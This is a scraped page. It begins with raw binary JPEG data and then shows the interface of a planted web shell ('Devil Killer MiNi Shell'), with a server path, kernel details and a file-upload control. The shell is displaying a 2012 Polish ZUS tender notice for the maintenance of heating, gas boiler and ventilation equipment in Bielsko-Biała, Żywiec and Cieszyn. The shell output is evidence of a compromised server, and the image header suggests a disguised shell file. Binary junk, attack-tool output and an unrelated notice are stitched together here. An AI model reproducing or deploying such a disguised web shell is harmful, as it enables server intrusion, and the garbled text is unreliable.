JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120228/58914-N-2012.html

<p class="kh_header"><b>Bielsko-Biała: Konserwacja, naprawa i eksploatacja:
- wymiennikowni ciepła w budynku Oddziału ZUS w Bielsku-Białej, ul. Krasińskiego 34 i ul. Traugutta 2;
- kotłowni gazowej w budynku Inspektoratu ZUS w Żywcu ul. Piernikarska 2;
- wymiennikowni ciepła oraz centralnej klimatyzacji w budynku Inspektoratu ZUS w Cieszynie ul. Bielska 29.</b><br>
<b>Numer ogłoszenia: 58914 - 2012; data zamieszczenia: 28.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Bielsku -Białej , ul. Krasińskiego 34, 43-300 Bielsko-Biała, woj. śląskie, tel. 033 825 27 15, faks 033 825 27 16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja, naprawa i eksploatacja:
- wymiennikowni ciepła w budynku Oddziału ZUS w Bielsku-Białej, ul. Krasińskiego 34 i ul. Traugutta 2;
- kotłowni gazowej w budynku Inspektoratu ZUS w Żywcu ul. Piernikarska 2;
- wymiennikowni ciepła oraz centralnej klimatyzacji w budynku Inspektoratu ZUS w Cieszynie ul. Bielska 29..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest następujący zakres prac:
ZAKRES ROBÓT SEZON GRZEWCZY
1)	Uruchomienie instalacji na sezon grzewczy
2)	Próby na gorąco wszystkich urządzeń i systemów stacji wymienników kotłowni oraz centrali wentylacji .
3)	Korekty nastaw sterowników.
4)	Nadzór nad pracą systemu.
5)	Uzupełnienie ciśnienia instalacji. 
6)	Usuwanie nieszczelności i odpowietrzanie instalacji 
7)	Wyłączenie systemu i zabezpieczenie instalacji na sezon letni
8)	24 godzinny serwis w wypadku awarii systemów ciepłowniczych .
9)	Czas reakcji na zgłoszenie awarii 6 godzin . 
WYMIENNIKOWNIA OKRES LETNI
1)	Demontaż , sprawdzenie wymiana zużytych elementów oraz ponowny montaż sterowników układu co.
2)	Sprawdzenie i ewentualne wymiany elementów sterowania 
3)	Demontaż konserwacja i montaż siłownika zaworu regulacyjnego co .
4)	Demontaż głowicy pompy obiegowej , czyszczenie kanałów odpowietrzających wirnik pompy czyszczenie wirnika i osłony wirnika , sprawdzenie i kasowanie pamięci alarmów modułu.
5)	Ponowny montaż głowicy pompy wymiennika.
6)	Czyszczenie filtrów wody sieciowej i instalacyjnej.
7)	Płukanie wymiennika płytowego po stronie sieciowej i instalacyjnej.
8)	Test zabezpieczeń termicznych stacji .
9)	Usunięcie nieszczelności i konserwacja armatury węzła systemu EWERS .
10)	Płukanie instalacji wewnętrznej .
11)	Próby funkcjonalne układów węzła co.
KOTŁOWNIE GAZOWE OKRES LETNI
1)	Czyszczenie i konserwacja osłon kotłów.
2)	Czyszczenie komory paleniskowej 
3)	Demontaż , konserwacja i montaż układów automatyki kotłów.
4)	Sprawdzenie i próby układów zabezpieczeń przed przegrzaniem i cofaniem spalin.
5)	Konserwacja grzybków zaworów elektromagnetycznych .
6)	Sprawdzenie i korekty parametrów sterownika kotłów 
7)	Demontaż głowic pomp obiegowych , czyszczenie kanałów  odpowietrzających wirnik pompy czyszczenie wirnika i osłony wirnika , sprawdzenie i kasowanie pamięci alarmów modułu.
8)	Ponowny montaż głowicy i modułów pomp obiegowych .
9)	Sprawdzenie i uzupełnienie powietrza w naczyniu przeponowym.
10)	Próby funkcjonalne układu zabezpieczenia i sygnalizacji nieszczelności gazu .
11)	Próby zaworu elektromagnetycznego odcinającego dopływ gazu do budynku .
12)	Usunięcie ewentualnych nieszczelności instalacji gazu.
13)	Usunięcie ewentualnych nieszczelności instalacji co.
14)	Próby funkcjonalne systemów ciepłowniczych .
WSZYSTKIE STACJE WYMIENNIKÓW  I KOTŁOWNIA 
W ramach opłaty miesięcznej wykonane zostaną okresowe (roczne) próby szczelności instalacji gazowej oraz kontrolne pomiary przeciwporażeniowe układów automatyki potwierdzone stosownymi protokołami .
CENTRALA WENTYLACJI 
1)	Regulacja systemu grzania i chłodzenia .
2)	Konserwacja siłowników przepustnic i zaworów .
3)	Konserwacja przekładni przepustnic powietrza .
4)	Konserwacja i wymiana łożysk turbin i silników .
5)	Konserwacja centrali .
6)	Regulacja naciągów pasków klinowych .
POMPY POŻAROWE
Dwa razy w roku należy przeprowadzić serwisowe próby pomp pożarowych w budynkach Oddziału ul Krasińskiego 34 oraz TI w Żywcu .
Stan techniczny pomp musi być potwierdzony protokołem serwisowym Autoryzowanego Serwisu GRUNDFOS 

Dodatkowy ogólny  zakres obowiązków:
1)	Utrzymanie urządzeń i systemów w stanie pełnej i nieprzerwanej sprawności technicznej oraz zapewnienie ich prawidłowego funkcjonowania;
2)	Dbanie o nie przekraczanie mocy zamówionej;
3)	Wykonawca przyjmował będzie zgłoszenia o uszkodzeniach przez 24 godziny na dobę 7 dni w tygodniu  - zapewnienie numeru telefonu, pod który zamawiający będzie mógł zgłaszać awarie poprzez ustalenie telefonów kontaktowych oraz połączenia telefaxowego;
4)	Wykonywanie pozostałych czynności wynikających z dokumentacji techniczno -ruchowej;
5)	Przekazywanie zamawiającemu informacji o pojawiających się nieprawidłowościach w pracy poszczególnych instalacji oraz sygnalizowanie o konieczności przeprowadzenia remontu instalacji lub urządzenia, 
6)	Prowadzenie książki eksploatacji i konserwacji instalacji, w której odnotowywane będą wszystkie czynności konserwacyjne i naprawcze wykonywane w instalacji, 
7)	Odnotowywanie wszelkich poleceń dotyczących zmiany parametrów pracy układu oraz poleceń zatrzymania instalacji, 
8)	Dokonywanie zakupu materiałów eksploatacyjnych takich jak wkłady filtrów, drobne części podzespołów wymieniane w trakcie prac konserwacyjnych itp. 
9)	Przybycie do siedziby zamawiającego i podjęcie działań zmierzających do zapewnienia prawidłowej pracy instalacji 
i urządzeń w ciągu 6 godzin od momentu powiadomienia przez zamawiającego o zaistniałej awarii lub wystąpieniu nieprawidłowości w pracy urządzeń, 
10)	Przeglądy konserwacyjne winny odbywać się bez dodatkowego wzywania i wystawiania zleceń. 
11)	Konserwacja wstępna systemów grzewczych winna odbyć się co najmniej 5 dni przed rozpoczęciem sezonu grzewczego, a konserwacja końcowa do 10 dni po zakończeniu sezonu. 
12)	W sezonie grzewczym min. 1 raz w tygodniu, bez dodatkowego wzywania, należy dokonać kontroli funkcjonowania systemu grzewczego we wszystkich obiektach. 
13)	W razie wystąpienia awarii systemów centralnego ogrzewania poza sezonem np. cieknący kaloryfer, kolanko, rura z ciepłą lub zimną wodą, Wykonawca ma obowiązek jej usunięcia, a Zamawiający ma obowiązek zapłaty za wymienione części w ramach niniejszej umowy. 
14)	Naprawy systemów grzewczych, zgłoszone wcześniej i zaakceptowane przez Zamawiającego, rozliczane będą wg kosztów zakupu materiałów i części zamiennych, bez kosztów robocizny i transportu. 
15)	Na wymienione części i urządzenia Wykonawca udzieli gwarancji zgodnie z kartą producenta. Na wykonane prace Wykonawca udzieli 12 miesięcznej gwarancji. Bieg terminu gwarancji liczony będzie od dnia podpisania protokołu odbioru prac. 
16)	Wykonawca wskaże osobę po stronie Wykonawcy odpowiedzialną za realizację usługi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2, 50.72.00.00-8, 50.72.10.00-5, 50.73.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości  1.645,89 zł  (słownie:  tysiąc sześćset czterdzieści pięć złotych 89/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca posiada aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt. 2 ustawy;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał lub wykonuje usługi w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane lub są wykonywane należycie  -załącznik  nr  6 do SIWZ;


Na potwierdzenie tego warunku Wykonawca przedłoży:

-Wykaz usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty wykonania i odbiorców,
-dokumenty potwierdzające, że wykonali w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:

-co najmniej jedną usługę na obsługę kotłowni gazowej trwającą przez co najmniej 12  miesięcy;
-co najmniej jedną usługę na obsługę wymiennikowni ciepła trwającą przez co najmniej 12 miesięcy; 
-co najmniej jedną usługę na obsługę urządzeń klimatyzacyjno-wentylacyjnych trwającą przez co najmniej 12 miesięcy,

z dokumentów musi wynikać, że usługi  zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie tego warunku Wykonawca przedłoży:
­-oświadczenie potwierdzające spełnianie warunków określonych w art. 22 ust. 1 ustawy
­</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że osoby, które będą wykonywały prace objęte przedmiotem zamówienia będą  posiadały:

­	uprawnienia do eksploatacji (E/G1) urządzeń, instalacji i sieci elektroenergetycznych o napięciu do 1 kV; w zakresie eksploatacji , obsługi , konserwacji remontu  montażu oraz kontrolno- pomiarowym,
­	uprawnienia do eksploatacji (E/G2) urządzenia wytwarzające , przetwarzające przesyłające i zużywające ciepło  o mocy powyżej 50 kW wraz urządzeniami pomocniczymi, w zakresie eksploatacji , obsługi , konserwacji remontu montażu oraz kontrolno- pomiarowym,
­	uprawnienia do eksploatacji (E/G3) urządzenia , instalacje i sieci gazowe wytwarzające , przetwarzające , przesyłające,  magazynujące oraz zużywające paliwa gazowe . Sieci gazowe 0,5MPa instalacje 5kPa odbiorniki powyżej 50kW, w zakresie eksploatacji , obsługi , konserwacji remontu montażu oraz kontrolno- pomiarowym,
­	uprawnienia do dozoru (D/G1) urządzeń, instalacji i sieci elektroenergetycznych o napięciu do 1 kV; w zakresie eksploatacji , obsługi , konserwacji remontu montażu oraz kontrolno- pomiarowym,.
­	uprawnienia do dozoru (D/G2) urządzenia wytwarzające , przetwarzające przesyłające i zużywające ciepło o mocy powyżej 50 kW wraz urządzeniami pomocniczymi, w zakresie eksploatacji,  obsługi , konserwacji remontu montażu oraz kontrolno- pomiarowym,
­	uprawnienia do dozoru (D/G3) urządzenia, instalacje i sieci gazowe wytwarzające , przetwarzające , przesyłające, magazynujące oraz zużywające paliwa gazowe . Sieci gazowe 0,5MPa instalacje 5kPa odbiorniki powyżej 50kW. w zakresie eksploatacji , obsługi , konserwacji remontu montażu oraz kontrolno- pomiarowym.

Na potwierdzenie tego warunku Wykonawca przedłoży:
­-oświadczenie potwierdzające spełnianie warunków określonych w art. 22 ust. 1 ustawy ,
-wykaz osób wraz  z dokumentami potwierdzającymi ww. uprawnienia oraz oświadczenie, że osoby te znają programowania i obsługi sterowników elektronicznych do obsługi stacji ciepłowniczych jak również narzędzia serwisowe dla obsługi modułów elektronicznych pomp (pilot serwisowy GRUNDFOS i WILO.)  - wg załącznika nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, iż jest ubezpieczony od odpowiedzialności cywilnej zakresie prowadzonej działalności gospodarczej obejmującej łącznie odpowiedzialność cywilną z minimalną sumą ubezpieczenia co najmniej 100.000,00 zł.

 Na potwierdzenie tego warunku Wykonawca przedłoży:

-opłaconą polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej zakresie prowadzonej działalności gospodarczej obejmującej łącznie odpowiedzialność cywilną na sumę ubezpieczenia co najmniej 100.000,00 zł. lub równowartości tej kwoty w walucie obcej, która zostanie przeliczona według tabeli kursów  NBP obowiązującego w dniu wystawienia polisy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie, że Wykonawca nie zalega z opłacaniem podatków lub że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu sporządzone wg załącznika nr 4 do SIWZ;
2.Oświadczenie, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu sporządzone wg załącznika nr 5 do SIWZ.
3.Oświadczenie o braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w  art. 24 ust. 1 ustawy Prawo zamówień publicznych - załącznik  nr  1 do SIWZ;
4.Formularz ofertowy  ( zaleca się aby stanowił  stronę tytułową );
5.Formularz cenowy - zał. nr 7 do SIWZ
6.Zaleca się dołączenie do oferty kserokopii dokumentu potwierdzającego wniesienie wadium, jeżeli zostało wniesione w formie innej niż w pieniądzu;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza możliwość dokonania zmian umowy w zakresie opisu przedmiotu zamówienia i jego cech oraz sposobu i terminu jego realizacji.

2.Zamawiający dopuszcza możliwość zmiany umowy w zakresie przeniesienia praw i obowiązków wynikających z umowy na osoby trzecie w zakresie cesji wierzytelności.

3.Zmiana umowy wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego.

4.Zmiana postanowień umowy następuje w formie pisemnej pod rygorem nieważności.

5.Z wnioskiem o zmianę postanowień umowy może wystąpić zarówno Wykonawca jak i Zamawiający.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie  Zamawiającego w Bielsku-Białej, w budynku PTTK ul. Krasińskiego 38, w pokoju nr 206 (II p.), w Wieloosobowym Stanowisku Zamówień Publicznych, w godz. od 8:00 do 14:00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2012 godzina 10:00, miejsce: W siedzibie  Zamawiającego w Bielsku-Białej, w budynku PTTK ul. Krasińskiego 38, w pokoju nr 206 (II p.), w Wieloosobowym Stanowisku Zamówień Publicznych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





